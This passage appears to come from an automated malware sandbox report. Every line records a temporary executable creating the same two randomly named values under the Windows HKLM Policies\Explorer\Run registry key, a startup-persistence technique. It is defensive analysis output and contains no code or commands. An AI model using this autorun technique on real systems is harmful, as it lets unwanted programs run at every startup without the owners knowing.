Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
